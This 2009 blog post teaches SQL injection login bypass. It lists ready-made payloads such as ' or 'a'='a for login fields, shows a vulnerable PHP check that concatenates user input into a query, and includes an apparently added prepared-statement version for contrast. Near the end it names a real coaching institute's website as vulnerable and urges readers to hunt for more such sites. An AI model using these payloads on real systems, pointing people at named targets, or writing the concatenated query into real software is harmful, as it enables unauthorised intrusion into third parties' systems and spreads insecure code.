Wednesday, December 9, 2009

SQL Injection - Part 1

Structured Query Language

' or '1'='1 Injection


SQL injection is a technique for injecting SQL into a query through user input, typically via web pages. The logic that validates a user's authenticity is manipulated by supplying extra SQL. Many web pages take parameters from the web user and build an SQL query to the database from them. For example, when a user logs in, the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. It is possible to send a crafted user name and/or password field that changes the SQL query and thus grants entry to the website.

This is my first article on SQL Injection. So, here we will see how to inject an SQL query into the username and password fields to gain access to the website. Not all websites are vulnerable to SQL Injection. We have to search for websites that are vulnerable to SQL Injection. This is simple.

Just enter ' or 'a'='a in username and password field and click login.

List of golden queries:
All the following codes can be used for SQL Injection.
  • ' or 'a'='a
  • ' or '1'='1
  • ' or '0'='0
  • ' or '007'='007
  • ' or 'biti'='biti
  • ' or 'technozone'='technozone
  • ' or 1=1 --
Example:
Following PHP code is for validating the authenticity of the user.


$_SESSION['username']=$_POST["username"];
$_SESSION['password']=$_POST["password"]; 

// query for a user/pass match (the posted values are concatenated into the SQL string unescaped)
$result=mysql_query("select * from users where username='" . $_SESSION['username'] . "' and password='" . $_SESSION['password'] . "'");

// retrieve number of rows resulted
$num=mysql_num_rows($result);

if($num < 1)
{
    //Login Failed
    header('Refresh: 2; URL=login.php?msg=login_failed');
}
else
{
    //Login Successful
    header('Refresh: 2;URL=admin/admin_home.php?msg=login_success');
}

So, if we put ' or 'a'='a in the username and password fields, the query for a user/pass match will become


$result=mysql_query("select * from users where username='' or 'a'='a' and password='' or 'a'='a'");

The above statement will now return all the rows from the table users, because the WHERE condition evaluates to true for every row: AND binds more tightly than OR, so the trailing or 'a'='a' alone makes the whole condition true. The user validation code only checks that at least one row came back, so the golden query ' or 'a'='a gets us into the website.
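
The same login check written two ways, as an added example that is not the author's code: the concatenated form from the listing above, and a hardened form that uses a prepared statement and a stored password hash. The in-memory SQLite database (via PDO), the table layout, the sample user and the function names login_concatenated and login_prepared are assumptions made for this illustration.

```php
<?php
// Constructed demo data: an in-memory SQLite table, not the site's real schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)");
$ins = $db->prepare("INSERT INTO users (username, password_hash) VALUES (?, ?)");
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Pattern from the article: input is pasted into the SQL text, so quotes in
// the input change the structure of the WHERE clause.
function login_concatenated(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT * FROM users WHERE username='" . $user .
           "' AND password_hash='" . $pass . "'";
    return count($db->query($sql)->fetchAll()) >= 1;
}

// Hardened form: the SQL text is fixed, the user name travels only as a bound
// value, and the password is verified in PHP against the stored hash.
function login_prepared(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare("SELECT password_hash FROM users WHERE username = :u");
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();          // false when no such user exists
    return is_string($hash) && password_verify($pass, $hash);
}

// The string quoted in the article, sent in both fields, then a normal login
// and a wrong password against the hardened function.
$payload = "' or 'a'='a";
$cases = [
    'concatenated, article string' => login_concatenated($db, $payload, $payload),
    'prepared, article string'     => login_prepared($db, $payload, $payload),
    'prepared, valid credentials'  => login_prepared($db, 'alice', 'correct horse'),
    'prepared, wrong password'     => login_prepared($db, 'alice', 'wrong'),
];
foreach ($cases as $label => $accepted) {
    printf("%-30s %s\n", $label, $accepted ? 'login accepted' : 'login refused');
}
```

With the prepared statement the quote characters never reach the SQL parser as syntax, so the input is compared as an ordinary user name.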

I have found a vulnerable site where you can use this golden query ' or 'a'='a. This vulnerable website belongs to an institution related to IIT JEE Coaching. The site is www.fiitjee.com.

Friends, search for more vulnerable sites and inform them of the vulnerability.





